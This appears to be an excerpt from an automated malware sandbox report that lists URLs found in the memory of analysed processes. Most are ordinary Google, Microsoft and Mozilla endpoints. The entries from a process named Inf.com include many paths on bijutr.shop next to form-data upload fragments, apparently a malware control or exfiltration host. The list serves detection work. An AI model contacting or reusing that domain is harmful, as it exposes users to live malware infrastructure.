Source: Inf.com, 00000012.00000002.3022504782.0000000004C31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bijutr.shop/5
Source: Inf.com, 00000012.00000002.3021593436.0000000001A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bijutr.shop/A
Source: Inf.com, 00000012.00000002.3022504782.0000000004C31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bijutr.shop/O
Source: Inf.com, 00000012.00000002.3021593436.0000000001A33000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bijutr.shop/SeA
Source: Inf.com, 00000012.00000002.3021593436.0000000001A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bijutr.shop/b
Source: Inf.com, 00000012.00000002.3021593436.0000000001A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bijutr.shop/e3
Source: Inf.com, 00000012.00000002.3021593436.0000000001A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bijutr.shop/op
Source: Inf.com, 00000012.00000002.3021593436.0000000001A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bijutr.shop/q
Source: Inf.com, 00000012.00000002.3019523263.000000000053C000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://bijutr.shop7900ZU
Source: Inf.com, 00000012.00000002.3019523263.000000000046D000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://bijutr.shop8c084472f6a1nt-Disposition:
Source: Inf.com, 00000012.00000002.3019523263.000000000046D000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://bijutr.shopEUK6P8
Source: Inf.com, 00000012.00000002.3019523263.000000000046D000.00000040.00001000.00020000.00000000.sdmp, Inf.com, 00000012.00000002.3019523263.000000000053C000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://bijutr.shopKNOHVA
Source: Inf.com, 00000012.00000002.3019523263.000000000046D000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://bijutr.shopUK6P8
Source: Inf.com, 00000012.00000002.3019523263.000000000046D000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://bijutr.shopart/form-data;
Source: Inf.com, 00000012.00000002.3019523263.000000000040C000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://bijutr.shopsh;
Source: Inf.com, 00000012.00000002.3019523263.000000000046D000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://bijutr.shopta
Source: Inf.com, 00000012.00000002.3025048546.0000000006C2B000.00000004.00000800.00020000.00000000.sdmp, Inf.com, 00000012.00000002.3022504782.0000000004CD1000.00000004.00000800.00020000.00000000.sdmp, WT2NOZ.18.dr	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: Inf.com, 00000012.00000002.3025048546.0000000006C2B000.00000004.00000800.00020000.00000000.sdmp, Inf.com, 00000012.00000002.3022504782.0000000004CD1000.00000004.00000800.00020000.00000000.sdmp, WT2NOZ.18.dr	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: chrome.exe, 00000015.00000003.2593082155.00000ED800C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2599700581.00000ED800C34000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.ico
Source: chrome.exe, 00000015.00000003.2556222226.00000ED800338000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore
Source: chrome.exe, 00000015.00000003.2551352759.00000ED800CB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2551690036.00000ED800E54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2552216394.00000ED800E54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2550043485.00000ED800CB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2556749383.00000ED800E54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2550102367.00000ED800CCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2556222226.00000ED800338000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstoreLDDiscover
Source: chrome.exe, 00000015.00000003.2538132137.0000392C003AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2537018388.0000392C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2583975141.00000ED80280C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
Source: chrome.exe, 00000015.00000003.2538132137.0000392C003AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2537018388.0000392C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2583975141.00000ED80280C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
Source: chrome.exe, 00000015.00000003.2538530355.0000392C00694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2591906960.00000ED8029E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2591792926.00000ED8029D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
Source: chrome.exe, 00000015.00000003.2538132137.0000392C003AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2537018388.0000392C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2583975141.00000ED80280C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
Source: chrome.exe, 00000015.00000003.2591906960.00000ED8029E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2591792926.00000ED8029D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/https://google-ohttp-relay-query.fastly-edge.com/
Source: chrome.exe, 00000015.00000003.2531090286.00005BA0002EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2531069786.00005BA0002E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/cr/report
Source: chrome.exe, 00000015.00000003.2542264266.00000ED800490000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: Inf.com, 00000012.00000002.3025048546.0000000006C2B000.00000004.00000800.00020000.00000000.sdmp, Inf.com, 00000012.00000002.3022504782.0000000004CD1000.00000004.00000800.00020000.00000000.sdmp, WT2NOZ.18.dr	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: Inf.com, 00000012.00000002.3025048546.0000000006C2B000.00000004.00000800.00020000.00000000.sdmp, Inf.com, 00000012.00000002.3022504782.0000000004CD1000.00000004.00000800.00020000.00000000.sdmp, WT2NOZ.18.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: powershell.exe, 00000000.00000002.1966743727.000001D062BE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.1966743727.000001D062BE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.1966743727.000001D062BE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: chrome.exe, 00000015.00000003.2595143418.00000ED801D1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/report-to/gws/none
Source: chrome.exe, 00000015.00000003.2542264266.00000ED800490000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/
Source: chrome.exe, 00000015.00000003.2583975141.00000ED80280C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview29
Source: chrome.exe, 00000015.00000003.2542264266.00000ED800490000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-autopush.corp.google.com/
Source: chrome.exe, 00000015.00000003.2542264266.00000ED800490000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-0.corp.google.com/
Source: chrome.exe, 00000015.00000003.2542264266.00000ED800490000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-1.corp.google.com/
Source: chrome.exe, 00000015.00000003.2542264266.00000ED800490000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-2.corp.google.com/
Source: chrome.exe, 00000015.00000003.2542264266.00000ED800490000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-3.corp.google.com/
Source: chrome.exe, 00000015.00000003.2542264266.00000ED800490000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-4.corp.google.com/
Source: chrome.exe, 00000015.00000003.2542264266.00000ED800490000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-5.corp.google.com/
Source: chrome.exe, 00000015.00000003.2542264266.00000ED800490000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-6.corp.google.com/
Source: chrome.exe, 00000015.00000003.2542264266.00000ED800490000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-preprod.corp.google.com/
Source: chrome.exe, 00000015.00000003.2542264266.00000ED800490000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-staging.corp.google.com/
Source: chrome.exe, 00000015.00000003.2556074286.00000ED8010C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-thirdparty.googleusercontent.com/32/type/
Source: chrome.exe, 00000015.00000003.2542264266.00000ED800490000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: chrome.exe, 00000015.00000003.2593082155.00000ED800C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2599700581.00000ED800C34000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: svchost.exe, 00000016.00000003.2541509841.0000028F60102000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.22.dr, edb.log.22.dr	String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: edb.log.22.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: edb.log.22.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: edb.log.22.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 00000016.00000003.2541509841.0000028F60102000.00000004.00000800.00020000.00000000.sdmp, edb.log.22.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: powershell.exe, 00000000.00000002.1942637880.000001D052D98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: chrome.exe, 00000015.00000003.2591792926.00000ED8029D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
Source: chrome.exe, 00000015.00000003.2538132137.0000392C003AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2537018388.0000392C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2583975141.00000ED80280C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
Source: chrome.exe, 00000015.00000003.2591906960.00000ED8029E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2591792926.00000ED8029D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/C
Source: chrome.exe, 00000015.00000003.2591906960.00000ED8029E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2591792926.00000ED8029D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/F
Source: chrome.exe, 00000015.00000003.2591906960.00000ED8029E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2591792926.00000ED8029D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/M
Source: chrome.exe, 00000015.00000003.2591906960.00000ED8029E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2591792926.00000ED8029D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/P
Source: chrome.exe, 00000015.00000003.2591906960.00000ED8029E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2591792926.00000ED8029D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Q
Source: chrome.exe, 00000015.00000003.2591906960.00000ED8029E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2591792926.00000ED8029D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/T
Source: chrome.exe, 00000015.00000003.2591906960.00000ED8029E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2591792926.00000ED8029D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/W
Source: chrome.exe, 00000015.00000003.2591906960.00000ED8029E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2591792926.00000ED8029D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Z
Source: chrome.exe, 00000015.00000003.2591906960.00000ED8029E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2591792926.00000ED8029D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/a
Source: chrome.exe, 00000015.00000003.2591906960.00000ED8029E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2591792926.00000ED8029D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/d
Source: chrome.exe, 00000015.00000003.2591906960.00000ED8029E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2591792926.00000ED8029D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/e
Source: chrome.exe, 00000015.00000003.2591906960.00000ED8029E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2591792926.00000ED8029D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/h
Source: chrome.exe, 00000015.00000003.2591906960.00000ED8029E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2591792926.00000ED8029D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/k
Source: chrome.exe, 00000015.00000003.2591906960.00000ED8029E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2591792926.00000ED8029D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/n
Source: chrome.exe, 00000015.00000003.2591906960.00000ED8029E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2591792926.00000ED8029D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/r
Source: chrome.exe, 00000015.00000003.2591906960.00000ED8029E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2591792926.00000ED8029D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/u
Source: chrome.exe, 00000015.00000003.2591906960.00000ED8029E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2591792926.00000ED8029D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/x
Source: chrome.exe, 00000015.00000003.2591906960.00000ED8029E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2591792926.00000ED8029D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/y
Source: chrome.exe, 00000015.00000003.2538530355.0000392C00694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2591906960.00000ED8029E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2591792926.00000ED8029D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
Source: chrome.exe, 00000015.00000003.2538132137.0000392C003AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2537018388.0000392C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2583975141.00000ED80280C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
Source: chrome.exe, 00000015.00000003.2538530355.0000392C00694000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/9
Source: chrome.exe, 00000015.00000003.2538530355.0000392C00694000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/Ena
Source: chrome.exe, 00000015.00000003.2538530355.0000392C00694000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/htt
Source: chrome.exe, 00000015.00000003.2591906960.00000ED8029E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2591792926.00000ED8029D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/
Source: chrome.exe, 00000015.00000003.2583975141.00000ED80280C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/b
Source: chrome.exe, 00000015.00000003.2583975141.00000ED80280C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://goto.google.com/sme-bugs27
Source: chrome.exe, 00000015.00000003.2583975141.00000ED80280C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://goto.google.com/sme-bugs2e
Source: WT2NOZ.18.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: chrome.exe, 00000015.00000003.2550353076.00000ED800AFC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/161903006
Source: chrome.exe, 00000015.00000003.2550353076.00000ED800AFC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/166809097
Source: chrome.exe, 00000015.00000003.2550353076.00000ED800AFC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/184850002
Source: chrome.exe, 00000015.00000003.2550353076.00000ED800AFC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/187425444
Source: chrome.exe, 00000015.00000003.2550353076.00000ED800AFC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/220069903
Source: chrome.exe, 00000015.00000003.2550353076.00000ED800AFC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/229267970
Source: chrome.exe, 00000015.00000003.2550353076.00000ED800AFC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/250706693
Source: chrome.exe, 00000015.00000003.2550353076.00000ED800AFC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/253522366
Source: chrome.exe, 00000015.00000003.2550353076.00000ED800AFC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/255411748
Source: chrome.exe, 00000015.00000003.2550353076.00000ED800AFC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/258207403
Source: chrome.exe, 00000015.00000003.2550353076.00000ED800AFC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/274859104
Source: chrome.exe, 00000015.00000003.2550353076.00000ED800AFC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/284462263
Source: chrome.exe, 00000015.00000003.2550353076.00000ED800AFC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/issues/166475273
Source: chrome.exe, 00000015.00000003.2537018388.0000392C003A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2
Source: chrome.exe, 00000015.00000003.2584084846.00000ED802D90000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboard
Source: chrome.exe, 00000015.00000003.2538132137.0000392C003AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2537018388.0000392C003A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
Source: chrome.exe, 00000015.00000003.2538132137.0000392C003AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2537018388.0000392C003A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
Source: chrome.exe, 00000015.00000003.2537018388.0000392C003A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiments
Source: chrome.exe, 00000015.00000003.2596195396.00000ED803028000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2596141624.00000ED80300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2595487527.00000ED802FA4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2596235017.00000ED801C14000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search?source=ntp
Source: chrome.exe, 00000015.00000003.2556148842.00000ED80120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2555932355.00000ED8003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2556074286.00000ED8010C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/upload
Source: chrome.exe, 00000015.00000003.2556148842.00000ED80120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2555932355.00000ED8003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2556074286.00000ED8010C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/uploadbyurl
Source: chrome.exe, 00000015.00000003.2538132137.0000392C003AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2537018388.0000392C003A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/2
Source: chrome.exe, 00000015.00000003.2538814022.0000392C006F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/upload
Source: chrome.exe, 00000015.00000003.2537018388.0000392C003A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/upload2
Source: chrome.exe, 00000015.00000003.2583975141.00000ED80280C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lensfrontend-pa.googleapis.com/v1/crupload2
Source: powershell.exe, 00000000.00000002.1984512408.000001D06B46D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: chrome.exe, 00000015.00000003.2575369578.00000ED800C30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=ee272b19-4411-433f-8f28-5c1
Source: chrome.exe, 00000015.00000003.2540616101.00000ED8001C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://m.google.com/devicemanagement/data/api
Source: chrome.exe, 00000015.00000003.2596195396.00000ED803028000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2596141624.00000ED80300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2595487527.00000ED802FA4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2596235017.00000ED801C14000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?tab=rm&ogbl
Source: chrome.exe, 00000015.00000003.2583975141.00000ED80280C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/shielded-email2B
Source: chrome.exe, 00000015.00000003.2577020384.00000ED80106C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
Source: powershell.exe, 00000000.00000002.1966743727.000001D062BE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: chrome.exe, 00000015.00000003.2595764404.00000ED803044000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2595394676.00000ED8030C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2595463775.00000ED8030D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2596235017.00000ED801C14000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogads-pa.googleapis.com
Source: chrome.exe, 00000015.00000003.2599700581.00000ED800C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2599700581.00000ED800C34000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com
Source: chrome.exe, 00000015.00000003.2595764404.00000ED803044000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2595394676.00000ED8030C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2595463775.00000ED8030D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2596235017.00000ED801C14000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
Source: chrome.exe, 00000015.00000003.2595764404.00000ED803044000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2595394676.00000ED8030C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2595463775.00000ED8030D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2596235017.00000ED801C14000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com/widget/callout?eom=1
Source: svchost.exe, 00000016.00000003.2541509841.0000028F60102000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.22.dr, edb.log.22.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: edb.log.22.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: chrome.exe, 00000015.00000003.2556148842.00000ED80120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2555932355.00000ED8003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2556074286.00000ED8010C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
Source: chrome.exe, 00000015.00000003.2583975141.00000ED80280C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.gcp.privacysandboxservices.com
Source: chrome.exe, 00000015.00000003.2583975141.00000ED80280C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com
Source: chrome.exe, 00000015.00000003.2583975141.00000ED80280C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
Source: chrome.exe, 00000015.00000003.2583975141.00000ED80280C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com
Source: chrome.exe, 00000015.00000003.2583975141.00000ED80280C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
Source: chrome.exe, 00000015.00000003.2583975141.00000ED80280C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shieldedids-pa.googleapis.com2
Source: chrome.exe, 00000015.00000003.2583975141.00000ED80280C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shieldedids-pa.googleapis.comJv
